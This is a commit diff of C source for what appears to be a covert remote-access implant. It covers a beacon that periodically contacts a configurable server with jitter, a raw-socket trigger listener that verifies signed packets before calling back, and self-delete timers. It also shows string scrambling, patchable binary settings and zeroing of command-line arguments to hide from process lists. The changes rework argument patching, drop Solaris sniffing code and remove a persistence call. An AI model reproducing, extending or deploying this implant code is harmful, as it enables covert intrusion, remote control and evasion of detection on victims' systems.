15	17		//Flag defines
16	18		// OS
	19	+	#define BH_UNDEFINED 0
17	20		#define BH_WINDOWS 10 // No longer supported
18	21		#define BH_LINUX_X86 20
19	22		#define BH_LINUX_X86_64 21
		skipped 32 lines
52	55		*/
53	56
54	57		typedef struct __attribute__ ((packed)) _BEACON_INFO {
55		-	char *host; // Domain name of beacon server
56		-	char *ip; // IP address of beacon server
	58	+	char *host; // Domain name or IP address of beacon server
	59	+	char *ip; // Resolved IP address of beacon server
57	60		int port;
58	61		char dns[2][16]; // Array of up to two DNS server addresses
59	62		unsigned char macAddr[MAC_ADDR_LEN];
		skipped 53 lines

■ ■ ■ ■ ■ ■

server/main.c

		skipped 60 lines
61	61		//**************************************************************
62	62		// Patchable command line arguments
63	63
64		-	struct cl_args
65		-	{
	64	+	struct __attribute__ ((packed)) cl_args {
66	65		unsigned int sig;
67	66		unsigned int beacon_port;
68		-	unsigned int host_len;
69		-	char beacon_ip[256];
70		-	char dns[2][16];
71		-	char iface[16];
72		-	unsigned char idKey[ID_KEY_HASH_SIZE];
	67	+	unsigned int trigger_delay;
73	68		unsigned long init_delay;
74	69		unsigned int interval;
75		-	unsigned int trigger_delay;
76	70		unsigned int jitter;
77	71		unsigned long delete_delay;
78		-	char sdpath[SD_PATH_LENGTH];
79		-	unsigned int patched;
	72	+	unsigned int patched; // Patched flag
	73	+	unsigned char idKey[ID_KEY_HASH_SIZE];
	74	+	char sdpath[SD_PATH_LENGTH]; // Path of self-delete control files
	75	+	char beacon_ip[256]; // Domain name or IP address of beacon server
	76	+	char dns[2][16]; // DNS server IP addresses (up to 2) in dotted quad format
80	77		};
81	78
82	79		#define SIG_HEAD 0x7AD8CFB6
83	80
84		-	struct cl_args args;
	81	+	struct cl_args args = {SIG_HEAD, 443, 0, 0, 0, 0, 0, 0, {0}, {0}, {0}, {{0}} };
85	82
86	83		//**************************************************************
87	84		D (
		skipped 25 lines
113	110		)
114	111
115	112		//**************************************************************
	113	+
116	114		static int is_elevated_permissions( void );
117	115		static void clean_args( int argc, char argv[], char new_argv0 );
118	116		static void * asloc( char *string );
119	117
120		-
	118	+	//**************************************************************
121	119
122		-	//**************************************************************
123	120		int main(int argc, char** argv)
124	121		{
125	122		int c = 0;
126		-	char *dnsIP = args.dns[0];
127	123		struct in_addr beaconIPaddr;
128		-	char *szInterface = NULL;
129	124		int trigger_delay = DEFAULT_TRIGGER_DELAY;
130	125		unsigned long delete_delay = SELF_DEL_TIMEOUT;
131	126		int retVal = 0;
132	127		char sdpath[SD_PATH_LENGTH] = {0};
133	128		FILE *f;
134	129		struct stat st;
	130	+	BEACONINFO beaconInfo;
135	131		#ifndef DEBUG
136	132		int status = 0;
137	133		#endif
138	134
139		-	BEACONINFO beaconInfo;
140		-
141		-	memset(&args, 0 , sizeof(struct cl_args));
142		-	args.sig = SIG_HEAD;
143		-	memset(&beaconInfo, 0, sizeof(BEACONINFO));
144		-	beaconInfo.port = DEFAULT_BEACON_PORT;
145		-	beaconInfo.initDelay = DEFAULT_INITIAL_DELAY;
146		-	beaconInfo.interval = DEFAULT_BEACON_INTERVAL;
147		-	beaconInfo.percentVariance = DEFAULT_BEACON_JITTER * 0.01f;
148		-
149	135		ikey[0] = '\0';
150	136		init_strings(); // De-scramble strings
151	137
		skipped 11 lines
163	149		initSrandFlag = 1;
164	150		}
165	151
166		-
167	152		//To See Crypto Keys, ENABLE THIS SECTION with debug level 4...
168	153		#if 0
169	154		DLX(4,
		skipped 7 lines
177	162
178	163		if (args.patched == 1) {
179	164		// Binary was patched -- all patched times should already be in milliseconds
180		-	DLX(1, printf("Binary was patched with arguments\n"));
181		-
182		-	beaconInfo.host = args.beacon_ip;
183	165		beaconInfo.port = args.beacon_port;
184		-	szInterface = args.iface;
	166	+	trigger_delay = args.trigger_delay;
185	167		beaconInfo.initDelay = args.init_delay;
186	168		beaconInfo.interval = args.interval;
187		-	memcpy(ikey, args.idKey, ID_KEY_HASH_SIZE * sizeof(unsigned char));
188		-	trigger_delay = args.trigger_delay;
	169	+	beaconInfo.percentVariance = args.jitter * 0.01f;
189	170		delete_delay = args.delete_delay;
190		-	beaconInfo.percentVariance = args.jitter * 0.01f;
	171	+
	172	+	memcpy(ikey, args.idKey, ID_KEY_HASH_SIZE * sizeof(unsigned char));
191	173		memcpy(sdpath, args.sdpath, SD_PATH_LENGTH * sizeof(char));
	174	+	cl_string((unsigned char *)sdpath, sizeof(sdpath));
192	175
193		-	cl_string( (unsigned char *)args.beacon_ip, args.host_len );
194		-	beaconInfo.ip[args.host_len] = '\0';
195		-	DLX(1, printf("\tDecoded patched value for hostname/IP: %s\n", beaconInfo.ip));
196		-	cl_string( (unsigned char *)args.iface, sizeof( args.iface ) );
197		-	DLX(1, printf( "\tDecoded patched value for interface: %s\n", szInterface));
198		-	cl_string((unsigned char *)sdpath, sizeof(sdpath));
199		-	DLX(1, printf( "\tDecoded sdpath: %s\n", sdpath));
200		-	strncpy(sdcfp, sdpath, strlen(sdpath));
	176	+	cl_string((unsigned char *)args.beacon_ip, sizeof(args.beacon_ip));
	177	+	beaconInfo.host = args.beacon_ip;
	178	+
	179	+	cl_string((unsigned char *)args.dns[0], sizeof(args.dns[0]));
	180	+	cl_string((unsigned char *)args.dns[1], sizeof(args.dns[1]));
	181	+	strcpy(beaconInfo.dns[0], args.dns[0]);
	182	+	strcpy(beaconInfo.dns[1], args.dns[1]);
	183	+	strcpy(sdcfp, sdpath);
201	184
202		-	DLX(1, printf( "\tDecoded DNS server address: %s\n", dnsIP));
	185	+	#if 0 // Enable for debugging of patched binaries
	186	+	printf("\nBinary was patched with arguments as follows:\n");
	187	+	printf("\t%32s: %-s\n", "Beacon Server IP address", beaconInfo.host);
	188	+	printf("\t%32s: %-d\n", "Beacon Server Port number", args.beacon_port);
	189	+	printf("\t%32s: %-s\n", "Primary DNS Server IP address", args.dns[0]);
	190	+	printf("\t%32s: %-s\n", "Secondary DNS Server IP address", args.dns[1]);
	191	+	printf("\t%32s: %-lu\n", "Beacon Initial Delay (sec)", args.init_delay / 1000);
	192	+	printf("\t%32s: %-d\n", "Beacon Interval (sec)", args.interval / 1000);
	193	+	printf("\t%32s: %-d\n", "Beacon Jitter (%)", args.jitter);
	194	+	printf("\t%32s: %-lu\n", "Self Delete Delay (sec)", args.delete_delay);
	195	+	printf("\t%32s: %-s\n", "Self Delete Control File Path", sdpath);
	196	+	printf("\t%32s: %-d\n\n", "Trigger Delay (+/-30 sec)", args.trigger_delay / 1000);
	197	+	#endif
203	198
204	199		goto patched_binary;
	200	+	} else {
	201	+	beaconInfo.port = DEFAULT_BEACON_PORT;
205	202		}
206	203		DLX(1, printf("NOTE: Binary was NOT/NOT patched with arguments\n\n"));
207	204
208	205		// process options
209	206		//while(EOF != (c = getopt(argc, argv, OPT_STRING)))
210	207		#ifdef DEBUG
211		-	while((c = getopt(argc, argv, "a:cD:d:hI:i:j:K:k:P:p:S:s:t:")) != -1)
	208	+	while((c = getopt(argc, argv, "a:cD:d:hi:j:K:k:P:p:S:s:t:")) != -1)
212	209		#else
213	210		while((c = getopt(argc, argv, ohshsmdlas3r)) != -1)
214	211		#endif
		skipped 16 lines
231	228		beaconInfo.initDelay = strtoul(optarg, NULL, 0) * 1000;
232	229		break;
233	230
234		-	case 'I':
235		-	// TODO: new option. what validation is needed?
236		-	szInterface = asloc( optarg );
237		-	break;
238		-
239	231		case 'i':
240	232		// user enters delay in seconds and this is converted to milliseconds
241	233		beaconInfo.interval = atoi(optarg) * 1000;
		skipped 14 lines
256	248		if (ikey[0] != '\0') { // Ensure that both -k and -K options aren't used together.
257	249		// fprintf(stderr, "Option error\n");
258	250		fprintf(stderr, "%s\n", oe1);
259		-	return -1;
	251	+	return -2;
260	252		}
261	253
262	254		if (access(optarg, R_OK)) {
263	255		fprintf(stderr, "%s\n", oe2);
264		-	return -1;
	256	+	return -3;
265	257		}
266	258		if (stat(optarg, &statbuf) != 0) {
267	259		perror("Option K");
268		-	return -1;
	260	+	return -3;
269	261		}
270	262		if (statbuf.st_size >= ID_KEY_LENGTH_MIN) { // Validate that the key text is of sufficient length
271	263		sha1_file((const char *)optarg, ikey); // Generate the ID key
		skipped 3 lines
275	267		DLX(1, printf("\n\n\n" ));
276	268		} else {
277	269		fprintf(stderr, "%s\n", oe3);
278		-	return -1;
	270	+	return -4;
279	271		}
280	272		break;
281	273		}
		skipped 5 lines
287	279		if (ikey[0] != '\0') { // Ensure that both -k and -K options aren't used together.
288	280		// fprintf(stderr, "%s\n" "Option error");
289	281		fprintf(stderr, "%s\n", oe1);
290		-	return -1;
	282	+	return -2;
291	283		}
292	284
293		-	if ( strlen( optarg ) < ID_KEY_LENGTH_MIN ) {
	285	+	if (strlen( optarg ) < ID_KEY_LENGTH_MIN) {
294	286		fprintf(stderr, "%s\n", oe3);
295		-	return -1;
	287	+	return -4;
296	288		}
297	289		DLX(1, printf( "KeyPhrase: %s \n", optarg));
298	290		sha1((const unsigned char *)optarg, strlen(optarg), ikey);
		skipped 12 lines
311	303		strcpy(sdcfp, optarg); // Copy the path from the argument
312	304		} else {
313	305		fprintf(stderr, "%s\n", sde);
314		-	return -1;
	306	+	return -5;
315	307		}
316	308		break;
317	309
		skipped 7 lines
325	317		if ((dns = strtok(address_list, ","))) {
326	318		if (strlen(dns) > 16) {
327	319		fprintf(stderr, "%s\n", oe4);
328		-	return -1;
	320	+	return -6;
329	321		}
330	322		memcpy(beaconInfo.dns[0], dns, strlen(dns));
331	323		} else {
332	324		beaconInfo.dns[0][0] = '\0';
333	325		fprintf(stderr, "%s\n", sdf); // Parameter missing
334		-	return -1;
	326	+	return -7;
335	327		}
336	328
337	329		// Get 2nd DNS server address if it was entered and validate its length
338	330		if ((dns = strtok(NULL, ","))) {
339	331		if (strlen(dns) > 16) {
340	332		fprintf(stderr, "%s\n", oe4);
341		-	return -1;
	333	+	return -6;
342	334		}
343	335		memcpy(beaconInfo.dns[1], dns, strlen(dns));
344	336		} else
		skipped 24 lines
369	361		if (beaconInfo.initDelay > 0 && beaconInfo.interval == 0 ) {
370	362		DLX(1, printf("No Beacon Interval specified!\n"));
371	363		DLX(1, printUsage(argv[0]));
372		-	return -1;
	364	+	return -8;
373	365		}
374	366		if (beaconInfo.initDelay >= (INT_MAX-1)) {
375	367		DLX(1, printUsage(argv[0]));
376		-	return -1;
	368	+	return -9;
377	369		}
378	370
379	371		if (ikey[0] == '\0') {
380	372		DLX(1, printUsage(argv[0]));
381		-	return 0;
	373	+	return -10;
382	374		}
383	375
384	376		clean_args(argc, argv, NULL); // Zero command line arguments
		skipped 4 lines
389	381
390	382		if (beaconInfo.initDelay > 0) { // Beacons enabled
391	383
392		-	if (beaconInfo.port == -1) {
	384	+	if (beaconInfo.port == 0) {
393	385		DLX(1, printf("No Beacon Port Specified!\n"));
394	386		DLX(1, printUsage(argv[0]));
395	387		}
396	388
397		-	// Obtain Beacon IP address
398		-	if (beaconInfo.host == NULL) {
	389	+	if (beaconInfo.host == NULL) { // At this point, the domain name or IP address appears in beaconInfo.host
399	390		DLX(1, printf("No Beacon IP address specified!\n"));
400	391		DLX(1, printUsage(argv[0]));
401		-	return -1;
	392	+	return -11;
402	393		}
403	394
404	395		if (inet_pton(AF_INET, beaconInfo.host, &beaconIPaddr) <= 0) { // Determine if beacon IP is a valid address
405	396		if (args.dns[0] == NULL && args.patched == 0) { // If not, verify that a DNS server address was specified
406	397		DLX(1, printf("Beacon IP was specified as a domain name, but no valid DNS server address was specified to resolve the name!\n"));
407		-	return -1;
	398	+	return -12;
408	399		}
409	400		}
410	401		}
411	402
412	403		// Construct self delete control and log files with full path names
413	404		if (strlen((const char *)sdcfp) == 0) {
414		-	strcpy(sdcfp, (const char *)sddp);
	405	+	strcpy(sdcfp, (const char *)sddp); // If the path wasn't specified use the default ("/var")
415	406		}
416	407
417	408		if (sdcfp[strlen(sdcfp)] != '/') // If the path is missing a trailing '/', add it.
		skipped 20 lines
438	429		DLX(1, printf("\"%s\" file already exists\n", (char *)sdcfp ));
439	430		}
440	431
441		-	if ( args.patched == 1 ) {
442		-	retVal = EnablePersistence(beaconInfo.ip, beaconInfo.port);
443		-	if( 0 > retVal) {
444		-	DLX(1, printf("\nCould not enable Persistence!\n"));
445		-	return -1;
446		-	}
447		-	}
	432	+	#if 0 // Enable for debugging of patched binaries
	433	+	printf("\nStarting beacon with the following parameters:\n");
	434	+	printf("\t%32s: %-s\n", "Beacon Server", beaconInfo.host);
	435	+	printf("\t%32s: %-d\n", "Beacon Server Port", beaconInfo.port);
	436	+	printf("\t%32s: %-s\n", "Primary DNS Server IP Address", beaconInfo.dns[0]);
	437	+	printf("\t%32s: %-s\n", "Secondary DNS Server IP Address", beaconInfo.dns[1]);
	438	+	printf("\t%32s: %-lu\n", "Initial Beacon Delay (sec)", beaconInfo.initDelay);
	439	+	printf("\t%32s: %-i\n", "Initial Beacon Delay (sec)", beaconInfo.interval);
	440	+	printf("\t%32s: %-f\n\n", "Initial Beacon Delay (sec)", beaconInfo.percentVariance);
	441	+	#endif
448	442
449	443		#ifndef DEBUG
450	444		status = daemonize(); // for Linux and Solaris
		skipped 7 lines
458	452		// create beacon thread
459	453		DLX(1, printf( "Calling BeaconStart()\n"));
460	454		retVal = beacon_start(&beaconInfo);
461		-
462	455		if (0 != retVal) {
463	456		DLX(1, printf("Beacon Failed to Start!\n"));
464	457		}
		skipped 6 lines
471	464
472	465		#ifndef __VALGRIND__
473	466		DLX(2, printf( "\tCalling TriggerListen()\n"));
474		-	(void)TriggerListen( szInterface, trigger_delay, delete_delay ); //TODO: TriggerListen() doesn't return a meaningful value.
	467	+	(void)TriggerListen(trigger_delay, delete_delay); //TODO: TriggerListen() doesn't return a meaningful value.
475	468		#endif
476	469
477	470		return 0;
478	471		}
479	472
480	473		//****************************************************************************
481		-	// used to copy argv[] elements out so they can be zeriozed, if permitted by the OS
	474	+	// used to copy argv[] elements out so they can be zeroed, if permitted by the OS
482	475		// Most helpful for unix-like systems and their process lists
483	476		static void * asloc( char *string )
484	477		{
		skipped 61 lines

■ ■ ■ ■ ■ ■

server/server_strings.txt

		skipped 23 lines
24	24		#define n inp183Aq " Insufficient permissions. Try again...\n"
25	25
26	26		//#define n cmdLineOptionFlags "a:cp:d:hI:i:j:K:k:s:t:"
27		-	#define n cIures4j "a:cD:d:hI:i:j:K:k:P:p:S:s:t:"
	27	+	#define n cIures4j "a:cD:d:hi:j:K:k:P:p:S:s:t:"
28	28		#define n oe1 "Option error"
29	29		#define n oe2 "File not found"
30	30		#define n oe3 "ID too short"
		skipped 200 lines

■ ■ ■ ■ ■ ■

server/trigger_listen.c

		skipped 130 lines
131	131
132	132		DLX(4, printf("Preparing to exec...\n"));
133	133
134		-	#if 0 // TODO: Fix this for Solaris
135		-	/* Solaris SPARC has memory alignment issues, so the bytes of interest need, first,
136		-	to be copied into a variable that is properly aligned */
137		-	memcpy( &tb_id, &( recvd_payload->package[4] ), sizeof( uint16_t ) );
138		-	tb_id = htons( tb_id );
139		-	D( printf("%s, %4d: Received Port: %d\n", __FILE__, __LINE__, tb_id ); )
140		-
141		-	#if defined SOLARIS
142		-	memcpy( &( addrin.S_un ), &( recvd_payload->package[0] ), sizeof( addrin ) );
143		-	#else
144		-	memcpy( &( addrin.s_addr ), &( recvd_payload->package[0] ), sizeof( addrin ) );
145		-	#endif
146		-	#endif
147		-
148	134		// IPv4 addresses only....
149	135		{
150	136		char callback_address[INET_ADDRSTRLEN];
		skipped 18 lines
169	155
170	156		//******************************************************************
171	157
172		-	int TriggerListen( char *iface, int trigger_delay, unsigned long delete_delay )
	158	+	int TriggerListen(int trigger_delay, unsigned long delete_delay)
173	159		{
174	160		int socket_fd, packet_length;
175	161		int counter = 0;
		skipped 1 lines
177	163
178	164		Payload recvd_payload;
179	165		TriggerInfo *tParams;
180		-	#ifdef LINUX
181	166		struct sockaddr_ll packet_info;
182	167		size_t packet_info_size = sizeof( packet_info);
183		-	#endif
	168	+
184	169
185	170		DL(2);
186	171		// reap any CHILD processes that die, prevent zombies
187	172		// this is not needed because no processes are forked
188	173		signal( SIGCHLD, sigchld_reaper );
189	174
190		-	socket_fd = dt_get_socket_fd( iface );
	175	+	socket_fd = dt_get_socket_fd();
191	176
192	177		if( socket_fd == FAILURE )
193	178		{
		skipped 10 lines
204	189		}
205	190
206	191		memset( packet_buffer, 0, MAX_PKT );
207		-	#if defined SOLARIS
208		-	// DLX(6, printf( "Listening on solaris raw socket\n"));
209		-	packet_length = sniff_read_solaris( socket_fd, packet_buffer, MAX_PKT );
210		-	// DLX(8, printf( "Packet received with length %d bytes\n", packet_length));
211		-
212		-	if ( packet_length == FAILURE ) {
213		-	// not sure what to do upon recv error
214		-	DLX(5, printf(" ERROR: sniff_read_solaris() returned FAILURE\n"));
215		-	continue;
216		-	}
217		-
218		-	#else
219	192
220	193		if ( ( packet_length = recvfrom( socket_fd, packet_buffer, MAX_PKT, 0,
221	194		(struct sockaddr ) &packet_info, (socklen_t ) &packet_info_size ) ) == FAILURE )
		skipped 2 lines
224	197		DLX(4, printf("Error: recvfrom() failure!\n"));
225	198		continue;
226	199		}
227		-	#endif
	200	+
228	201		else
229	202		{
230	203		if ( dt_signature_check( packet_buffer, packet_length, &recvd_payload) == SUCCESS )
		skipped 102 lines

■ ■ ■ ■ ■ ■

server/trigger_listen.h

		skipped 22 lines
23	23
24	24		#define MAX_PKT 1750
25	25
26		-	//int TriggerListen( char szInterface, char clientIP, int clientPort );
27		-	int TriggerListen( char *szInterface, int trigger_delay, unsigned long delete_delay );
	26	+	int TriggerListen(int trigger_delay, unsigned long delete_delay);
28	27
29	28		// TODO: delete this prototype
30	29		int trigger_main( int argc, char ** argv);
		skipped 9 lines

■ ■ ■ ■ ■ ■

server/trigger_sniff.c

		skipped 7 lines
8	8		#include "unpifi.h"
9	9		#endif
10	10
11		-	#if defined LINUX
12	11		#include <features.h>
13	12		#include <linux/if_packet.h>
14	13		#include <linux/if_ether.h>
15		-	#endif
16		-
17		-	#if defined SOLARIS
18		-	#include <sys/dlpi.h>
19		-	#include <stropts.h>
20		-	#include <unistd.h>
21		-	#include <sys/types.h>
22		-	#include <sys/stat.h>
23		-	#include <fcntl.h>
24		-	#define MIN(X,Y) ((X) < (Y) ? (X) : (Y))
25		-	#endif
26	14
27	15		#include <string.h>
28	16		#include <stdlib.h>
		skipped 7 lines
36	24		/* This is the only external function in the file,
37	25		* all other funcs are private static helpers to this.
38	26		*/
39		-	int dt_get_socket_fd( char *iface )
	27	+	int dt_get_socket_fd()
40	28		{
41	29		int fd;
42	30
43		-	fd = dt_create_raw_socket( iface );
	31	+	fd = dt_create_raw_socket();
44	32
45	33		if ( fd == -1 )
46	34		{
		skipped 23 lines
70	58		}
71	59
72	60		//************************************************************************
73		-	int dt_create_raw_socket( char *iface )
	61	+	int dt_create_raw_socket()
74	62		{
75	63		int raw_fd;
76		-	iface = iface;
77	64
78	65		if ( ( raw_fd = socket( PF_PACKET, SOCK_RAW, htons( ETH_P_IP ) ) ) == -1 )
79	66		{
		skipped 5 lines
85	72
86	73		#endif //_#if defined LINUX
87	74
88		-
89		-	//************************************************************************
90		-
91		-	#if defined SOLARIS
92		-
93		-	#include <unistd.h> // for ioctl()
94		-	#include <stropts.h> // for ioctl opts.
95		-
96		-	#include "dlcommon.h"
97		-
98		-	//************************************************************************
99		-	int sniff_read_solaris( int fd, void *out, int outlen )
100		-	{
101		-	struct strbuf data;
102		-	char buffer[ MAXDLBUF ]; //8k x sizeof( long )
103		-	int ret = 0, flags = 0;
104		-
105		-	// initialize the incoming packet buffer
106		-	memset( &data, 0, sizeof(data) );
107		-	data.buf = buffer;
108		-
109		-	// only request the minimum size of our buffer here,
110		-	// or the destination buffer. Saves us some logic at
111		-	// memcpy() below - when we go to fill the callers buffer
112		-	data.maxlen = MIN( outlen, MAXDLBUF );
113		-	data.len = 0;
114		-
115		-	/* Upon successful completion, a non-negative value is
116		-	returned. A return value of 0 indicates that a full message
117		-	was read successfully. A return value of MORECTL indicates
118		-	that more control information is waiting for retrieval. A
119		-	return value of MOREDATA indicates that more data are wait-
120		-	ing for retrieval. A return value of MORECTL \| MOREDATA
121		-	indicates that both types of information remain. */
122		-	if ( ( ret = getmsg( fd, NULL, &data, &flags ) ) < 0 )
123		-	{ // ERROR
124		-	DLX(6, perror("getmsg() error: "));
125		-	return FAILURE;
126		-	}
127		-
128		-	if ( data.len > 0 )
129		-	{
130		-	memcpy( out, data.buf, data.len );
131		-	return( data.len );
132		-	}
133		-
134		-	// not reached
135		-	return FAILURE;
136		-	}
137		-
138		-	//************************************************************************
139		-
140		-	static int sniff_make_promiscuous_solaris( int fd )
141		-	{
142		-	char buf[ MAXDLBUF ];
143		-
144		-	// dlpromisconreq( fd, DL_PROMISC_PHYS ); // TODO - to get all packets?
145		-	dlpromisconreq( fd, DL_PROMISC_SAP );
146		-	dlokack( fd, buf );
147		-
148		-	return 0;
149		-	}
150		-
151		-
152		-	//************************************************************************
153		-	int sniff_start_solaris( char *devname )
154		-	{
155		-	char device[16], buf[MAXDLBUF];
156		-	int device_len;
157		-	uint32_t ppa = 0, sap = 0;
158		-	int fd;
159		-
160		-	// create logical device path, ppa#, sap# = 0 for ethernet.
161		-	device_len = strlen( devname );
162		-	ppa = atoi( &(devname[device_len - 1]) );
163		-	snprintf( device, 16, "/dev/%s", devname );
164		-	D( printf( " DEBUG: devname = %s\n", devname ); )
165		-	device_len = strlen( device );
166		-	device[ device_len - 1 ] = 0; // nul terminate off the number.
167		-
168		-	D( printf( " DEBUG: Solaris logical network device: ==> %s\n", device ); )
169		-	D( printf( " DEBUG: PPA: ==> %d\t\tSAP: ==> %d\n", ppa, sap ); )
170		-	fd = open( device, 2 ); // 2 = O_RDWR?
171		-
172		-	// attach logical device fd to ppa.
173		-	dlattachreq( fd, ppa );
174		-	dlokack( fd, buf );
175		-
176		-	sniff_make_promiscuous_solaris( fd );
177		-
178		-	// bind logical device to sap.
179		-	dlbindreq( fd, sap, 0, DL_CLDLS, 0, 0 );
180		-	dlbindack( fd, buf );
181		-
182		-	// issue DLIOCRAW.
183		-	if ( strioctl( fd, DLIOCRAW, -1, 0, NULL ) < 0 )
184		-	{
185		-	D( perror( " strioctl() setting DLIOCRAW" ); )
186		-	goto cleanup;
187		-	}
188		-
189		-	// flush the read side of the stream.
190		-	if ( ioctl( fd, I_FLUSH, FLUSHR ) < 0 )
191		-	{
192		-	D( perror( " ioctl() flushing read stream" ); )
193		-	goto cleanup;
194		-	}
195		-
196		-	return( fd );
197		-
198		-	cleanup:
199		-	D( printf( " ERROR: starting Solaris raw link-layer socket.\n" );)
200		-	close( fd );
201		-	return( -1 );
202		-	}
203		-
204		-	/* TODO: Add this loopback interface check.
205		-	if (( ctx->name ) && ( strncmp( ctx->name, "lo", 2 ) == 0 ))
206		-	{
207		-	debug_error("Solaris cannot be set to sniff on loopback device.\n" );
208		-	free( ctx->name );
209		-	ctx->name = NULL;
210		-	return( -1 );
211		-	}
212		-	*/
213		-
214		-	//************************************************************************
215		-	int dt_find_interface_and_bind( int fd, int proto )
216		-	{
217		-	// to silence compiler warnings
218		-	fd = fd;
219		-	proto = proto;
220		-
221		-	return 0;
222		-	}
223		-
224		-	//************************************************************************
225		-	int dt_create_raw_socket( char *iface )
226		-	{
227		-	int raw_fd;
228		-
229		-	D( printf( " DEBUG: Starting dt_create_raw_socket\n" ); )
230		-
231		-	if ( ( raw_fd = sniff_start_solaris( iface ) ) == -1 )
232		-	{
233		-	return FAILURE;
234		-	}
235		-
236		-	return raw_fd;
237		-	}
238		-	#endif //_#if defined SOLARIS
239		-

■ ■ ■ ■ ■ ■

server/trigger_sniff.h

		skipped 2 lines
3	3
4	4		#include "function_strings.h"
5	5
6		-	int dt_get_socket_fd( char *iface );
	6	+	int dt_get_socket_fd();
7	7
8	8		int dt_find_interface_and_bind(int fd, int proto);
9	9
10		-	int dt_create_raw_socket( char *iface );
	10	+	int dt_create_raw_socket();
11	11
12	12		int dt_bind_raw_socket( char* device, int raw_fd, int proto);
13	13
		skipped 10 lines

Beacon changes/fixes.